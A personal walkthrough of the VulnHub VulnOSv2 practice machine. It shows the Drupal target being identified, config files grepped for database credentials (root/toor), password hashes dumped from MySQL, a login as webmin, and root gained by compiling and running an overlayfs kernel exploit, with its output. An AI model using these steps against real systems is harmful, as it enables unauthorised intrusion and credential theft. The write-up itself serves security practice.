vulnhub


VulnOsV2

05 April 2022 10:26 PM

Screenshot of the target web site at 192.168.43.174/jabc: "JABC, Just Another Bioware Company. Your world leader in Bioware. What is JABC NOT? Human with a bit of technology. What is JABC? ... with a bit of human."

Screenshot: the site is identified as Drupal. The output of searchsploit Drupal 7 lists, among many older entries (HTML injection, cross-site scripting, denial of service, module RCEs), the 'Drupalgeddon' SQL injection entries for Drupal 7.0 < 7.31 (add admin user, admin session, reset password, remote code execution; php/webapps/34992.py, 34984.py, 34993.php, 35150.php), the 'Drupalgeddon3' authenticated RCE for < 7.58, and the 'Drupalgeddon2' remote code execution entries for < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 (php/webapps/44449.rb, php/remote/44482.rb, php/webapps/44542.txt).


Analyzing Drupal files. Screenshot: a world-writable settings file (-rwxrwxrwx 1 root root 18599 Jan 15) contains the Drupal database settings template: 'driver' => 'mysql', 'database' => 'databasename', 'username' => 'username', 'password' => 'password', 'host' => 'localhost', 'port' => 3306, 'prefix' => 'myprefix_', with the comment explaining the 'main' prefix setting used when all database names share a prefix.

Screenshot: ls -l of the Drupal simpletest upgrade fixtures, present both in the distribution package and in the web root:

root root  270 Jan 15 2014 /usr/share/drupal7/modules/simpletest/tests/upgrade/drupal-6.user-no-password-token.database.php
root root 1114 Jan 15 2014 /usr/share/drupal7/modules/simpletest/tests/upgrade/drupal-6.user-password-token.database.php
root root  270 Apr 16 2016 /var/www/html/jabc/modules/simpletest/tests/upgrade/drupal-6.user-no-password-token.database.php
root root 1114 Apr 16 2016 /var/www/html/jabc/modules/simpletest/tests/upgrade/drupal-6.user-password-token.database.php

The password-token fixtures contain a Drupal test password hash (beginning $S$DAK...).

Searching for passwords in the config PHP files. Screenshot: grepping for "password" turns up, among other matches, $dbpass='toor'; and $dbuser='phpmyadmin'; in the phpMyAdmin configuration, a $cfg['Servers'][...]['AllowNoPassword'] = TRUE; setting, and define('DB_USER', 'username_here'); next to define('DB_USER', 'root');.

Database credentials: user -> root, pass -> toor

mysql> use jabcdocs;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
Tables_in_jabcdocs: odm_access_log, odm_admin, odm_category, odm_data, odm_department, odm_dept_perms, odm_dept_reviewer, odm_filetypes, odm_log, odm_odmsys, odm_rights, odm_settings, odm_udf, odm_user, odm_user_perms
15 rows in set (0.00 sec)

mysql> select * from odm_user;
Columns: id, username, password, department, phone, Email, last_name, first_name, pw_reset_code
id 1: webmin, b78aae356709f8c31118ea613980954b, department 1, phone 5555551212, webmin@example.com, webmin, web, NULL
id 2: guest, 084e0343a0486ff05530df6c705c8bb4, department 1, phone 555 5555555, guest@example.com, guest, guest, NULL
2 rows in set (0.04 sec)

mysql> show databases;
Database: information_schema, drupal7, jabcdocs, mysql, performance_schema, phpmyadmin
6 rows in set (0.00 sec)

mysql> use drupal7;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
Tables_in_drupal7: actions, aggregator_category, aggregator_category_feed, aggregator_category_item, aggregator_feed, aggregator_item, ... (rest of the list cut off in the screenshot)

mysql> select * from users;
Columns: uid, name, pass, mail, theme, signature, signature_format, created, access, login, status, timezone, language, picture, init, data
uid 0: the anonymous row (name, pass and mail empty, NULL data)
uid 1: webmin, pass $S$DPc41p2JwLXR6vgPCi.jC7WnRMkw3Zge3pVoJFnOn6gfMfsOr/Ug, mail VulnOSv2@localdomain.com, access 1462351302, login 1462351302, status 1, timezone Europe/Berlin, init VulnOSv2@localdomain.com
2 rows in set (0.00 sec)

mysql> use mysql;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
Tables_in_mysql: columns_priv, db, event, func, general_log, help_category, help_keyword, help_relation, help_topic, host, ndb_binlog_index, ... (rest of the list cut off in the screenshot)

mysql> select * from user;
Columns: User, Host, Password, followed by the privilege columns (Select_priv ... Drop_priv, Reload_priv, Shutdown_priv, Process_priv, File_priv, Grant_priv, Super_priv, Create_tmp_table_priv, Lock_tables_priv, Execute_priv, Repl_slave_priv, Create_routine_priv, Alter_routine_priv, Create_user_priv, Event_priv, Trigger_priv, ...), ssl_cipher, x509_issuer, x509_subject, max_questions, max_updates, max_connections, ...
root@localhost:  *9CFBBC772F3F6C106020035386DA5BBBF1249A11  Y ...
root@vulnosv2:   *9CFBBC772F3F6C106020035386DA5BBBF1249A11  Y ...
root@127.0.0.1:  *9CFBBC772F3F6C106020035386DA5BBBF1249A11  Y ...

Found the password for webmin: webmin 1 98 (hash b78aae356709f8c31118ea613980954b)

webmin@VulnOSv2:/tmp$ uname -a
Linux VulnOSv2 3.13.0-24-generic #47-Ubuntu SMP Fri May 2 23:31:42 UTC 2014 i686 i686 i686 GNU/Linux
webmin@VulnOSv2:/tmp$

Screenshot: searchsploit results for this kernel version include Linux Kernel 2.6.19 < 5.9 - 'Netfilter' Local Privilege Escalation (linux/local/50135.c), Linux Kernel 'SO_SNDBUFFORCE' / 'SO_RCVBUFFORCE' Local Privilege Escalation (linux/local/41995.c), Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation (linux/local/37292.c and linux/local/37293.txt), Linux Kernel 3.14-rc1 < 3.15-rc4 (x64) - Raw Mode PTY Echo Race Condition Privilege Escalation (linux_x86-64/local/33516.c), and Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.04/13.10) - Local Privilege Escalation (3) (linux_x86-64/local/31347.c).

webmin@VulnOSv2:/tmp$ gcc priv.c -o priv
webmin@VulnOSv2:/tmp$ ./priv
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# whoami
root
# cd /root
# ls
flag.txt
# cat flag.txt
Hello and welcome.
You successfully compromised the company "JABC" and the server completely !!!
Congratulations !!!
Hope you enjoyed it.
What do you think of A.I.?